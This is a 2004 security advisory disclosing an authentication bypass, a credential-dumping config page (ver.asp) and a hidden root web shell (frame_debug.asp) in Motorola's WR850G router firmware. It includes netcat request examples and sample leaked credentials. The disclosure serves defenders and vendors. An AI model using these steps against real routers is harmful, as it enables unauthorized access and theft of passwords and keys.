Twenty Year Anniversary

WR850G.txt

WR850G.txt
Posted Sep 29, 2004
Authored by Daniel Fabian | Site sec-consult.com

The firmware of Motorola's wireless WR850G router has a flaw that enables an attacker to log into the router's web interface without knowing username or password and the ability to gain knowledge of the router's username and password after logging in.

tags | advisory, web
MD5 | 712aa3955a9b39ddb0a41c94a1f45939

WR850G.txt

Change Mirror Download
-------------------------------------------------------------------------
| Motorola Wireless Router WR850G Authentication Circumvention |
-------------------------------------------------------------------------

Date: 09-23-2004
Author: Daniel Fabian
Product: Motorola Wireless Router WR850G, Firmware v4.03
Vendor: Motorola (http://www.motorola.com)
Vendor-Status: vendor contacted (09-02-2004 and 09-09-2004)
Vendor-Patches: none available

~~~~~~~~
Synopsis
~~~~~~~~~~~~~~~~~~~~~~~~

The firmware of Motorola's wireless router WR850G features a flaw that
enables an attacker to
* log into the routers web interface without knowing username or
password,
* gain knowledge of the router's username and password after logging
in.

Additionally the firmware contains an easter egg that provides a user
with a root shell on the routers linux software. However this root shell
can only be opened after a successful authentication.


~~~~~~~~
Vendor Status
~~~~~~~~~~~~~~~~~~~~~~~~

The vendor has been contacted twice (09-02-2004 and 09-09-2004) but has
so far failed to respond to our inquiries. Therefor, a patch is not
yet available.


~~~~~~~~
Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~


Authentication Circumvention:
-----------------------------

Scope:
One limitation of the routers firmware is that only one system at a
time can be logged into the web interface. However it does not correctly
keep track of the currently logged in system, making it possible for an
attacker to log into the web interface without having to know a username
or a password.

Exploit:
All an attacker has to do is to periodically poll for a file on the
routers web server that can only be accessed when logged into the
router (most likely this is going to be the file /ver.asp; see the
second described vulnerability). The attacker will get 302 redirect
messages, as long as nobody is logged in. However as soon as someone
knowing the password (ie. the real system administrator) logs into the
web interface from a different system (might either be behind the router,
on in front of it), not the system administrator is granted access, but
the attacker.

Example:
server:/var/www/htdocs# nc 10.10.69.244 8080
GET /ver.asp HTTP/1.0

HTTP/1.0 302 Redirect
Server: httpd
Date: Thu, 02 Sep 2004 14:30:15 GMT
Location: redirect.asp
Content-Type: text/xml
Connection: close

[Administrator (on a different IP) successfully logs in]

server:/var/www/htdocs# nc 10.10.69.244 8080
GET /ver.asp HTTP/1.0

HTTP/1.0 200 Ok
Server: httpd
Date: Thu, 02 Sep 2004 14:32:37 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

[snip content]

The administrator trying to log in gets the error message:
403 Only one login allowed
The existing client:192.168.107.58

He therefore knows that someone is tempering with his system, though.



Password Recovery
-----------------

Scope:
The routers web server contains a page named ver.asp that contains an
output of every single configuration switch of the router. Among those
switches are:

* Web Interface Username and Password
* WEP Encryption Keys
* SNMP Community String
* DDNS password
* ...

The page can only be accessed when logged into the web interface either
by knowing the username and password, or by using the method described
above.


Exploit:

server:/var/www/htdocs# nc 80.108.69.244 8080
GET /ver.asp HTTP/1.0

HTTP/1.0 200 Ok
Server: httpd
Date: Thu, 02 Sep 2004 13:40:09 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

[A short excerpt of the output:]
Pmon Version: 9<br>
Firmware version: 4.03, April.15, 2004<br>
pptp_passwd=<br>
http_username=admin<br>
wl0_ssid=hugo<br>
wl0_key1=a3b6d3351f<br>
http_passwd=strictlysecret<br>
wl_passphrase=tumbledry<br>
radius_key=<br>
SNMPCommunityOne=public<br>


Easter Egg: Root Shell
----------------------

Additionally to the page ver.asp, the routers web server also contains
a page named frame_debug.asp that contains a web shell where a user
can execute any command on the routers software. The page can only be
accessed when logged into the web interface either by knowing the
username and password, or by using the method described
above.

Example:
#cat /proc/version
Linux version 2.4.20 (sparklan@localhost.localdomain) (gcc version 3.0
20010422 (prerelease) with bcm4710a0 modifications) #37 Thu Apr 15
16:34:09 CST 2004

#uptime
2:56pm up 7:33, load average: 0.59, 0.23, 0.09

#cat /proc/cpuinfo
system type : Broadcom BCM947XX
processor : 0
cpu model : BCM4710 V0.0
BogoMIPS : 82.94
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : no
hardware watchpoint : no
VCED exceptions : not available
VCEI exceptions : not available
dcache hits : 3694025514
dcache misses : 3395654302
icache hits : 3303822179
icache misses : 3094738920
instructions : 2214575440


~~~~~~~~
Counter Measures
~~~~~~~~~~~~~~~~~~~~~~~~

Even though this does not resolve the vulnerability, the web interface
should be configured only to listen to LAN and not to WAN interfaces.
This at least eliminates the risk of being hacked from the outside, while
it is still possible for an insider to gain the passwords in the way
described above.

EOF Daniel Fabian / @2004
d.fabian at sec-consult dot com

~~~~~~~~
Contact
~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Unternehmensberatung GmbH

Büro Wien
Blindengasse 3
A-1080 Wien
Austria

Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
http://www.sec-consult.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    15 Files
  • 14
    Dec 14th
    14 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close